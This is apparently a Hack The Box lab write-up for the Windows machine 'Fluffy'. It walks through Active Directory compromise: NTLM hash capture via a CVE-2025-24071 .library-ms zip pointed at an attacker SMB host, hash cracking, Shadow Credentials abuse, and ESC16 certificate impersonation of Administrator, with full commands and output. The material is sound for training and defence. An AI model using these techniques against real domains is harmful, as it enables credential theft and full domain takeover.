# HTB | Fluffy This is a Windows box, you can find it [here](https://app.hackthebox.com/machines/Fluffy) IP - 10.129.116.225 MACHINE INFORMATION - As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990! ## NMAP ```jsx └─$ nmap -sT -p- --min-rate 10000 10.129.116.225 -Pn -oA nmap_ports Starting Nmap 7.95 ( ) at 2025-05-25 13:09 IST Nmap scan report for 10.129.116.225 Host is up (0.26s latency). Not shown: 65518 filtered tcp ports (no-response) PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 3268/tcp open globalcatLDAP 5985/tcp open wsman 9389/tcp open adws 49667/tcp open unknown 49677/tcp open unknown 49678/tcp open unknown 49680/tcp open unknown 49698/tcp open unknown 49713/tcp open unknown 49747/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 103.04 seconds ``` ```jsx └─$ nmap -sC -sV -p 53,88,139,389,445,464,593,3268,5985,9389,49667,49677,49678,49680,49698,49713,49747 10.129.116.225 -Pn -oA nmap_ports_details Starting Nmap 7.95 ( ) at 2025-05-25 13:12 IST Nmap scan report for 10.129.116.225 Host is up (0.48s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-25 14:42:29Z) 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-05-25T14:44:07+00:00; +7h00m03s from scanner time. | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb | Not valid before: 2025-04-17T16:04:17 |_Not valid after: 2026-04-17T16:04:17 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-05-25T14:44:07+00:00; +7h00m03s from scanner time. | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.fluffy.htb | Not valid before: 2025-04-17T16:04:17 |_Not valid after: 2026-04-17T16:04:17 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49678/tcp open msrpc Microsoft Windows RPC 49680/tcp open msrpc Microsoft Windows RPC 49698/tcp open msrpc Microsoft Windows RPC 49713/tcp open msrpc Microsoft Windows RPC 49747/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-05-25T14:43:26 |_ start_date: N/A |_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s Service detection performed. Please report any incorrect results at . Nmap done: 1 IP address (1 host up) scanned in 110.38 seconds ``` ### LDAP ```jsx └─$ ldapsearch -x -H ldap://10.129.116.225 -x -s base namingcontexts # extended LDIF # # LDAPv3 # base <> (default) with scope baseObject # filter: (objectclass=*) # requesting: namingcontexts # # dn: namingcontexts: DC=fluffy,DC=htb namingcontexts: CN=Configuration,DC=fluffy,DC=htb namingcontexts: CN=Schema,CN=Configuration,DC=fluffy,DC=htb namingcontexts: DC=DomainDnsZones,DC=fluffy,DC=htb namingcontexts: DC=ForestDnsZones,DC=fluffy,DC=htb # search result search: 2 result: 0 Success # numResponses: 2 # numEntries: 1 ``` ## SMB We have Read, Write on share `IT` ```jsx └─$ netexec smb 10.129.116.225 -u j.fleischman -p 'J0elTHEM4n1990!' --shares SMB 10.129.116.225 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) SMB 10.129.116.225 445 DC01 [+] fluffy.htb\\j.fleischman:J0elTHEM4n1990! SMB 10.129.116.225 445 DC01 [*] Enumerated shares SMB 10.129.116.225 445 DC01 Share Permissions Remark SMB 10.129.116.225 445 DC01 ----- ----------- ------ SMB 10.129.116.225 445 DC01 ADMIN$ Remote Admin SMB 10.129.116.225 445 DC01 C$ Default share SMB 10.129.116.225 445 DC01 IPC$ READ Remote IPC SMB 10.129.116.225 445 DC01 IT READ,WRITE SMB 10.129.116.225 445 DC01 NETLOGON READ Logon server share SMB 10.129.116.225 445 DC01 SYSVOL READ Logon server share ``` Let’s login to smb share ```jsx └─$ smbclient -U 'j.fleischman%J0elTHEM4n1990!' //10.129.116.225/IT ```

Let’s download everything ```jsx smb: \\> mask "" smb: \\> recurse on smb: \\> prompt off smb: \\> mget * ``` ## Foothold/shell ### **CVE-2025-24071** the pd `Upgrade_Notice.pdf` contains the report of vulnerability scans

Let’s look at the critical CVE first Found this [repo](https://github.com/0x6rss/CVE-2025-24071_PoC?tab=readme-ov-file) for CVE-2025-24071 **Technical Explanation of NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File (CVE-2025-24071)** When a specially crafted **.library-ms** file containing an SMB path is compressed within a RAR/ZIP archive and subsequently extracted, Windows Explorer automatically parses the contents of this file due to its built-in indexing and preview mechanism. This behaviour occurs because Windows Explorer processes certain file types automatically upon extraction to generate previews, thumbnails, or index metadata, even if the file is never explicitly opened or clicked by the user. The **.library-ms** file format is XML-based and is trusted by Windows Explorer to define search and library locations. Upon extraction, the indexing service and Explorer’s built-in file parsing mechanism immediately analyze the **.library-ms** file content to render appropriate icons, thumbnails, or metadata information. The provided file contains a **\** tag pointing directly to an attacker-controlled SMB server: ```jsx \\\\192.168.1.116\\shared ``` Upon extraction, Windows Explorer attempts to resolve this SMB path (**`\\\\192.168.1.116\\shared`**) automatically to gather metadata and index file information. This action triggers an implicit NTLM authentication handshake from the victim's system to the attacker-controlled SMB server. Consequently, the victim's NTLMv2 hash is sent without explicit user interaction. This vulnerability arises because Windows Explorer implicitly trusts **.library-ms** files and automatically processes certain file types immediately upon their extraction from archives. Attackers exploit this implicit trust and automatic file processing behaviour to leak credentials, which can then be utilized for pass-the-hash attacks or offline NTLM hash cracking. Now, in order to exploit this, we need to run `Responder`. ```jsx sudo responder -I tun0 ``` Let's run the `PoC` ```jsx └─$ python3 poc.py Enter your file name: anurag.zip Enter IP (EX: 192.168.1.162): 10.10.16.15 completed ``` After running the `PoC` we get an `exploit.zip` file. ```jsx ┌──(anurag㉿anurag)-[~/htb/fluffy/CVE-2025-24071_PoC] └─$ ls README.md exploit.zip poc.py ``` Let's use SMB to upload this file onto the `IT` SMB share. ```jsx smb: \\> put exploit.zip ``` After waiting for 1 minute, we get a connection back on our `responder`

Cracking this `NTLM` hash on `hashcat`. ```jsx └─$ hashcat hash.txt /home/anurag/stuff/rockyou.txt ``` we got the password

### GenericAll Since we have valid cred we can use bloodhound ```jsx └─$ bloodhound-python -u p.agila -p '' -d fluffy.htb -ns 10.129.116.225 -c All --zip ``` We can see that `P.AGILA` → MemberOf → `SERVERCE ACCOUNT MANAGERS` → GenericAll → `SERVICE ACCOUNT` This is also known as full control. This privilege allows the trustee to manipulate the target object however they wish.

Now we can either: * Reset `SERVICE ACCOUNT` password (loud), **OR** * Add a Shadow Credential (quiet). ### Shadow Credential **What is a Shadow Credentials Attack?** The **Shadow Credentials attack** is a stealthy method that allows an attacker to **impersonate any user in Active Directory** by silently adding a **certificate-based authentication backdoor** to their account — without changing their password or hash. This method takes advantage of **Key Trust-based certificate authentication** in Active Directory environments that support **PKINIT (Public Key Cryptography for Initial Authentication)** and involves modifying a special attribute called `msDS-KeyCredentialLink` on the target user object. **Why we use Shadow Credential?** | Traditional Attack | Shadow Credentials | | ------------------------------ | ----------------------------- | | Reset password (loud) | Add certificate (quiet) | | Triggers logs, breaks services | Leaves user untouched | | High chance of detection | Very stealthy | | Short-term access | Can provide persistent access | Shadow Credentials is often used to **maintain persistence** or escalate privileges without being detected. **How does it works?** * **Generate a key pair and certificate request** * **Inject the certificate’s public key** into the `msDS-KeyCredentialLink` attribute of the target account in AD * Use the **private key (PFX)** to authenticate as that user via Kerberos PKINIT * You are now **authenticated as the victim user**, with no password, no hash, and no alerts **Prerequisites for Shadow Credential Attack** To perform this attack, the following are required: * The target account must be a **user account** (not a computer) * The attacker must have **permissions to write to the `msDS-KeyCredentialLink` attribute** of the target (e.g., `GenericWrite`, `GenericAll`, `WriteProperty`, etc.) * The domain must support **Key-based authentication** (default in modern AD environments) **Shadow Credential Attack our My Case** In our scenario, we had control of the user `P.AGILA`. Analyzing ACLs via BloodHound revealed: ```jsx P.AGILA → MemberOf → SERVERCE ACCOUNT MANAGERS → GenericAll → SERVICE ACCOUNT ``` * `P.AGILA` is a member of a group with **GenericAll** rights over the `SERVICE ACCOUNT` user * `SERVICE ACCOUNT` is a **normal user account** (not a computer) * GenericAll includes **WriteProperty** permission, which allows modification of the `msDS-KeyCredentialLink` attribute But first we need to add `p.aglia` to the `SERVICE ACCOUNT MANAGERS` group ```jsx └─$ bloodyAD -u 'p.agila' -p '' --dc-ip 10.129.116.225 add groupMember 'Service Accounts' 'p.agila' [+] p.agila added to Service Accounts ``` Now let's try and do a `Shadow Credential` attack against `winrm_svc` (since `winrm_svc` is a member of REMOTE MANAGEMENT USERS) ```jsx └─$ certipy shadow auto -account 'winrm_svc' -u 'p.agila@fluffy.htb' -p '' -dc-ip 10.129.116.225 ```

Now we have a hash for `winrm_svc` Let's try `winrm` with this hash.

we are in and got the `user.txt`

## Privilege Escalation ### ESC16 On running `certipy` with `-vulnerable` we didn’t find any vulnerability but Under the "Certificate Authorities" section for the target CA, we can see the OID `1.3.6.1.4.1.311.25.2` in the `Disabled Extensions` list. For more reference refer [this](https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally) ```jsx └─$ certipy find -u 'p.agila' -p 'prometheusx-303' -target 10.129.247.178 -text -stdout -vulnerable ```

**Steps to exploit:** * Change the victim account's UPN to match a target privileged(administrator in our case) account's `sAMAccountName`. * Request a certificate (which will automatically lack the SID security extension due to the CA's ESC16 configuration). * Revert the UPN change. * Use the certificate to impersonate the target. Let’s start the exploit Before we start we need to obtain credentials for the `ca_svc` account (via Shadow Credentials). ```jsx └─$ certipy shadow auto -account 'ca_svc' -u 'p.agila@fluffy.htb' -p prometheusx-303 -target fluffy.htb ```

Let’s first try to read initial UPN of the victim account ```jsx └─$ certipy account -username 'p.agila@fluffy.htb' -p '' -user 'ca_svc' read -dc-ip 10.129.241.24 Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Reading attributes for 'ca_svc': cn : certificate authority service distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb name : certificate authority service objectSid : S-1-5-21-497550768-2797716248-2627064577-1103 sAMAccountName : ca_svc servicePrincipalName : ADCS/ca.fluffy.htb userPrincipalName : ca_svc@fluffy.htb userAccountControl : 66048 whenCreated : 2025-04-17T16:07:50+00:00 whenChanged : 2025-05-21T22:24:00+00:00 ``` Since we can now read `ca_svc` now we have to modify `ca_svc`'s `upn` to be `Administrator`. ```jsx └─$ certipy account -username 'p.agila@fluffy.htb' -p '' -user 'ca_svc' -upn 'administrator' update -dc-ip 10.129.241.24 Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Updating user 'ca_svc': userPrincipalName : administrator [*] Successfully updated 'ca_svc' ``` Next we can request the `certificate` using the vulnerable `User` template. ```jsx └─$ certipy -debug req -username 'ca_svc' -hashes -dc-ip 10.129.245.229 -target dc01.fluffy.htb -ca 'FLUFFY-DC01-CA' -template 'User' Certipy v5.0.2 - by Oliver Lyak (ly4k) [+] Nameserver: '10.129.245.229' [+] DC IP: '10.129.245.229' [+] DC Host: None [+] Target IP: None [+] Remote Name: 'dc01.fluffy.htb' [+] Domain: '' [+] Username: 'CA_SVC' [+] Trying to resolve 'dc01.fluffy.htb' at '10.129.245.229' [+] Generating RSA key [*] Requesting certificate via RPC [+] Trying to connect to endpoint: ncacn_np:10.129.245.229[\\pipe\\cert] [+] Connected to endpoint: ncacn_np:10.129.245.229[\\pipe\\cert] [*] Request ID is 17 [*] Successfully requested certificate [*] Got certificate with UPN 'administrator' [*] Certificate has no object SID [*] Try using -sid to set the object SID or see the wiki for more details [*] Saving certificate and private key to 'administrator.pfx' [+] Attempting to write data to 'administrator.pfx' [+] Data written to 'administrator.pfx' [*] Wrote certificate and private key to 'administrator.pfx' ``` Now let's give `ca_svc` its original `UPN` back. ```jsx └─$ certipy account -username 'p.agila@fluffy.htb' -p '' -user 'ca_svc' -upn 'ca_svc' update -dc-ip 10.129.245.229 Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Updating user 'ca_svc': userPrincipalName : ca_svc [*] Successfully updated 'ca_svc' ``` And let's authenticate with the `pfx` certificate we just grabbed. ```jsx └─$ certipy auth -pfx administrator.pfx -dc-ip 10.129.245.229 -username 'administrator' -domain fluffy.htb Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN UPN: 'administrator' [*] Using principal: 'administrator@fluffy.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'administrator.ccache' [*] Wrote credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@fluffy.htb': ``` We can winrm via the hash and get the root.txt